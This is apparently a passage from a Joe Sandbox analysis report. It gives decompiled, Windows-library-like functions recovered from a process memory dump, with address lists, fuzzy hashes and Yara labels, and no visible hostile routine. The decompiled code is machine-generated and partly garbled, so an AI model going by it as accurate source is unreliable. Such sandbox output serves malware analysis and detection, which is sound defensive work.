					if(E03977D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E03A1A80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}










                                              0x03a1fde7
                                              0x03a1fde8
                                              0x03a1fdec
                                              0x03a1fdee
                                              0x03a1fdf5
                                              0x03a1fdf7
                                              0x03a1fdfc
                                              0x03a1fe19
                                              0x03a1fe22
                                              0x03a1fe26
                                              0x03a1fec6
                                              0x03a1fecd
                                              0x03a1fed5
                                              0x03a1fee7
                                              0x03a1fed7
                                              0x03a1fee0
                                              0x03a1fee0
                                              0x03a1feef
                                              0x03a1ff00
                                              0x03a1ff02
                                              0x03a1ff07
                                              0x03a1ff07
                                              0x00000000
                                              0x03a1feef
                                              0x03a1fe33
                                              0x03a1fe55
                                              0x03a1fe59
                                              0x03a1fe5b
                                              0x03a1fe5e
                                              0x03a1fe69
                                              0x03a1fe6d
                                              0x03a1fe6d
                                              0x03a1fe69
                                              0x03a1fe35
                                              0x03a1fe41
                                              0x03a1fe41
                                              0x03a1fe79
                                              0x03a1fe8b
                                              0x03a1fe7b
                                              0x03a1fe84
                                              0x03a1fe84
                                              0x03a1fe93
                                              0x00000000
                                              0x03a1fea8
                                              0x03a1feba
                                              0x00000000
                                              0x03a1feba
                                              0x03a1fdfe
                                              0x03a1fe01
                                              0x03a1fe02
                                              0x03a1fe08
                                              0x03a1ff0c
                                              0x03a1ff14
                                              0x03a1ff14

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                              • Instruction ID: b38355e1b7a5868aa0e852436bb83381307f7232193feb0348b8a3bb5777ef88
                                              • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                              • Instruction Fuzzy Hash: 4731283A304B806FD732DB68C944F6ABBEAEBC5250F1C425AE4468B782DA74DC61C710
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03A1EA55 Relevance: .1, Instructions: 111COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 70%
                                              			E03A1EA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E03972280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E03A1E815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E0395F900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						E0396FFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					E03A1AFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E03A1BCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E03977D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						E03A0FE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						E0396FFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E03A1A80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}






















                                              0x03a1ea55
                                              0x03a1ea66
                                              0x03a1ea68
                                              0x03a1ea6c
                                              0x03a1ea6f
                                              0x03a1ea72
                                              0x03a1ea75
                                              0x03a1ea7a
                                              0x03a1ea7a
                                              0x03a1ea7e
                                              0x03a1ea80
                                              0x03a1ea85
                                              0x03a1ea8b
                                              0x03a1eab5
                                              0x03a1eabc
                                              0x03a1eabf
                                              0x03a1eabf
                                              0x03a1eaca
                                              0x03a1eace
                                              0x03a1ead0
                                              0x03a1eae4
                                              0x03a1eaeb
                                              0x03a1eaf0
                                              0x03a1eaf5
                                              0x03a1eb09
                                              0x03a1eb0d
                                              0x03a1eb1d
                                              0x03a1eb2d
                                              0x03a1eb38
                                              0x03a1eb3d
                                              0x03a1eb41
                                              0x03a1eb4a
                                              0x03a1eb60
                                              0x03a1eb4c
                                              0x03a1eb52
                                              0x03a1eb59
                                              0x03a1eb59
                                              0x03a1eb68
                                              0x03a1eb71
                                              0x03a1eb71
                                              0x03a1ea8d
                                              0x03a1ea8f
                                              0x03a1ea92
                                              0x03a1ea97
                                              0x03a1ea97
                                              0x03a1ea9b
                                              0x03a1ea9c
                                              0x03a1ea9e
                                              0x03a1eaa6
                                              0x03a1eaa6
                                              0x03a1eb7e

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                              • Instruction ID: 7b960dee2c9e983a9cbf967b13d2ef656c4aa6d099b2af1f2edd332d840585d3
                                              • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                              • Instruction Fuzzy Hash: EC31A3766047059BC719DF24C980E6BB7AAFBC4310F04892EF9968B780DA30E815C7A1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 039D69A6 Relevance: .1, Instructions: 108COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 69%
                                              			E039D69A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x3a4d360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L03966C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E039D6BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E03999980() >= 0) {
							E03972280(_t56, 0x3a48778);
							_t77 = 1;
							_t68 = 1;
							if( *0x3a48774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x3a48774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E0395B6F0(0x393c338, 0x393c288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E03999520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E039995D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E0396FFB0(_t68, _t77, 0x3a48778);
				}
				_pop(_t78);
				return E0399B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}
































                                              0x039d69b5
                                              0x039d69be
                                              0x039d69c3
                                              0x039d69c9
                                              0x039d69cc
                                              0x039d69d1
                                              0x039d69d3
                                              0x039d69de
                                              0x039d69e1
                                              0x039d69ea
                                              0x039d69f6
                                              0x039d69fe
                                              0x039d6a13
                                              0x039d6a14
                                              0x039d6a15
                                              0x039d6a16
                                              0x039d6a1e
                                              0x039d6a26
                                              0x039d6a31
                                              0x039d6a36
                                              0x039d6a37
                                              0x039d6a40
                                              0x039d6a49
                                              0x039d6a4a
                                              0x039d6a53
                                              0x039d6a59
                                              0x039d6a5d
                                              0x039d6a5e
                                              0x039d6a64
                                              0x039d6a67
                                              0x039d6a6a
                                              0x039d6a6d
                                              0x039d6a70
                                              0x039d6a77
                                              0x039d6a7d
                                              0x039d6a86
                                              0x039d6a89
                                              0x039d6a9c
                                              0x039d6a9f
                                              0x039d6aa2
                                              0x039d6aa5
                                              0x039d6aaf
                                              0x039d6ab1
                                              0x039d6ab8
                                              0x039d6ab9
                                              0x039d6abb
                                              0x039d6abe
                                              0x039d6ac5
                                              0x039d6ac5
                                              0x039d6aaf
                                              0x039d6a40
                                              0x039d6a26
                                              0x039d69fe
                                              0x039d6ace
                                              0x039d6ad0
                                              0x039d6ad3
                                              0x039d6ad8
                                              0x039d6adf
                                              0x039d6adf
                                              0x039d6ae8
                                              0x039d6aef
                                              0x039d6aef
                                              0x039d6af9
                                              0x039d6b06

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6ad89cacc850f3a482454d6618884282bd02bdbb84ec35ad0cff707c908689a6
                                              • Instruction ID: e7d8830c03fae66deee69abf49c3e93fb2b3a28883beb95c1006a2f3dbdf4954
                                              • Opcode Fuzzy Hash: 6ad89cacc850f3a482454d6618884282bd02bdbb84ec35ad0cff707c908689a6
                                              • Instruction Fuzzy Hash: 06417FB5E01308AFDB14DFA9D941BFEBBF8EF88714F04812AE954A7240DB759905CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03955210 Relevance: .1, Instructions: 107COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 85%
                                              			E03955210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E039552A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E039995D0();
							L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E0396EB70(_t54, 0x3a479a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E039995D0();
								L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E0396EB70(_t54, 0x3a479a0);
						}
						return _t52;
					}
					L5:
					_t33 = E0399F3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E0396EB70(_t54, 0x3a479a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E039995D0();
							L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}














                                              0x03955220
                                              0x03955224
                                              0x039b0d13
                                              0x039b0d16
                                              0x039b0d19
                                              0x0395522a
                                              0x0395522a
                                              0x0395522d
                                              0x0395522d
                                              0x03955231
                                              0x03955235
                                              0x03955239
                                              0x039b0d5c
                                              0x039b0d62
                                              0x00000000
                                              0x00000000
                                              0x039b0d6a
                                              0x039b0d7b
                                              0x039b0d7f
                                              0x039b0d81
                                              0x039b0d84
                                              0x039b0d95
                                              0x039b0d95
                                              0x039b0d6c
                                              0x039b0d71
                                              0x039b0d71
                                              0x039b0d9a
                                              0x00000000
                                              0x0395524a
                                              0x0395524a
                                              0x03955250
                                              0x039b0d24
                                              0x039b0d35
                                              0x039b0d39
                                              0x039b0d3b
                                              0x039b0d3e
                                              0x039b0d50
                                              0x039b0d50
                                              0x039b0d26
                                              0x039b0d2b
                                              0x039b0d2b
                                              0x00000000
                                              0x039b0d55
                                              0x03955256
                                              0x0395525b
                                              0x03955265
                                              0x039b0da7
                                              0x0395526b
                                              0x0395526e
                                              0x03955272
                                              0x039b0db1
                                              0x039b0db4
                                              0x039b0dc5
                                              0x039b0dc5
                                              0x03955272
                                              0x03955278
                                              0x0395527e
                                              0x0395528a
                                              0x0395528c
                                              0x0395528d
                                              0x00000000
                                              0x03955280
                                              0x03955282
                                              0x03955288
                                              0x0395529f
                                              0x03955292
                                              0x00000000
                                              0x03955292
                                              0x00000000
                                              0x03955288
                                              0x0395527e

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fc81d71221fda62de887458573f1151f8438375fbe3b036687e014cbada4d2b7
                                              • Instruction ID: 7d67500da740cc297286baa5ffd5f0b2e86a4f04be385cdc934f35618bf379c8
                                              • Opcode Fuzzy Hash: fc81d71221fda62de887458573f1151f8438375fbe3b036687e014cbada4d2b7
                                              • Instruction Fuzzy Hash: F131C532651701ABCB21DB28CD41BABB7B9FF917A0F154A1AF8164B6E1E771E840C790
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0398A61C Relevance: .1, Instructions: 106COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 78%
                                              			E0398A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x3a30220);
				E039AD08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x3a47b9c; // 0x0
				_t55 = L03974620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E039AD0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x3a47b10 =  *0x3a47b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x3a4536c; // 0xb5ebe0
					if( *_t51 != 0x3a45368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x3a45368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x3a4536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E0398A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}


















                                              0x0398a61c
                                              0x0398a61e
                                              0x0398a623
                                              0x0398a628
                                              0x0398a62b
                                              0x0398a62d
                                              0x0398a648
                                              0x0398a64a
                                              0x0398a64f
                                              0x039c9b44
                                              0x0398a6ec
                                              0x0398a6f1
                                              0x0398a6f1
                                              0x0398a655
                                              0x0398a657
                                              0x0398a65a
                                              0x0398a65d
                                              0x0398a662
                                              0x0398a663
                                              0x0398a667
                                              0x0398a668
                                              0x0398a66d
                                              0x0398a706
                                              0x0398a706
                                              0x039c9bda
                                              0x039c9be6
                                              0x039c9beb
                                              0x00000000
                                              0x039c9beb
                                              0x0398a679
                                              0x039c9b7a
                                              0x00000000
                                              0x039c9b7a
                                              0x0398a683
                                              0x0398a6f4
                                              0x0398a6f7
                                              0x0398a6f9
                                              0x0398a6fd
                                              0x0398a6a0
                                              0x0398a6a0
                                              0x0398a6ad
                                              0x0398a6af
                                              0x0398a6b4
                                              0x039c9ba7
                                              0x039c9bac
                                              0x00000000
                                              0x00000000
                                              0x039c9bc6
                                              0x039c9bce
                                              0x039c9bd1
                                              0x039c9bd3
                                              0x039c9bd3
                                              0x00000000
                                              0x039c9bd1
                                              0x0398a6bd
                                              0x0398a6c3
                                              0x0398a6c6
                                              0x0398a6d2
                                              0x0398a701
                                              0x0398a704
                                              0x00000000
                                              0x0398a704
                                              0x0398a6d4
                                              0x0398a6d6
                                              0x0398a6d9
                                              0x0398a6db
                                              0x0398a6e1
                                              0x0398a6e6
                                              0x0398a6e8
                                              0x0398a6e8
                                              0x0398a6ea
                                              0x00000000
                                              0x0398a6ea
                                              0x0398a688
                                              0x0398a692
                                              0x0398a694
                                              0x0398a699
                                              0x00000000
                                              0x00000000
                                              0x0398a69d
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7d18db3c7d82362d65164ffa27a7d5da64e5656964864a451e67f20d74723640
                                              • Instruction ID: ab8a5aa5f90a2fcf310d08c322bfbd04191336c99eb3c7aaeefddb391779b56c
                                              • Opcode Fuzzy Hash: 7d18db3c7d82362d65164ffa27a7d5da64e5656964864a451e67f20d74723640
                                              • Instruction Fuzzy Hash: 32418CB9E00249DFCB14EF58C490B99BBF1FF89700F1980AAE804AF344D775A901CB94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03993D43 Relevance: .1, Instructions: 106COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E03993D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E03967B60(0, _t61, 0x39311c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E03967B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						_t12 =  &(_t61[2]); // 0x0
						 *((short*)( *_t12 + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L03974620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}
















                                              0x03993d4c
                                              0x03993d50
                                              0x03993d55
                                              0x03993d5e
                                              0x039ce79a
                                              0x00000000
                                              0x039ce79a
                                              0x03993d68
                                              0x039ce789
                                              0x03993d9d
                                              0x03993da3
                                              0x03993daf
                                              0x03993db5
                                              0x03993dbc
                                              0x03993dc4
                                              0x03993dc9
                                              0x03993dce
                                              0x039ce7ae
                                              0x039ce7ae
                                              0x03993dd9
                                              0x03993dde
                                              0x03993de2
                                              0x03993de7
                                              0x03993e0d
                                              0x03993e13
                                              0x03993e16
                                              0x03993e1e
                                              0x03993e25
                                              0x03993e28
                                              0x00000000
                                              0x00000000
                                              0x03993e2a
                                              0x03993e2f
                                              0x03993e37
                                              0x03993e37
                                              0x00000000
                                              0x03993e37
                                              0x03993e31
                                              0x00000000
                                              0x03993e31
                                              0x03993e20
                                              0x03993e20
                                              0x03993e35
                                              0x00000000
                                              0x03993de9
                                              0x03993de9
                                              0x03993de9
                                              0x03993dee
                                              0x03993dfd
                                              0x03993dff
                                              0x03993e02
                                              0x03993e05
                                              0x03993e05
                                              0x00000000
                                              0x03993df0
                                              0x03993de7
                                              0x039ce78f
                                              0x039ce794
                                              0x03993d79
                                              0x03993d84
                                              0x03993d89
                                              0x03993d8e
                                              0x00000000
                                              0x039ce7a4
                                              0x03993d96
                                              0x03993d9a
                                              0x00000000
                                              0x03993d9a
                                              0x00000000
                                              0x039ce794
                                              0x03993d6e
                                              0x03993d73
                                              0x00000000
                                              0x039ce7b5
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2bea9ffefc0790a0e72c9a1d2d1c0567ed1a16337cfd29c56eaeeca19d2dd532
                                              • Instruction ID: 593c8b9703bcdd517050bee60269acaaa1cef70ad3ad8b49937db36d5a9f682a
                                              • Opcode Fuzzy Hash: 2bea9ffefc0790a0e72c9a1d2d1c0567ed1a16337cfd29c56eaeeca19d2dd532
                                              • Instruction Fuzzy Hash: 8731B03AA15615DFEB24CF6DC491A6BBBE9EF85740709846EE84ACB350E730D840C791
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0397C182 Relevance: .1, Instructions: 104COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 68%
                                              			E0397C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E03977D50() != 0) {
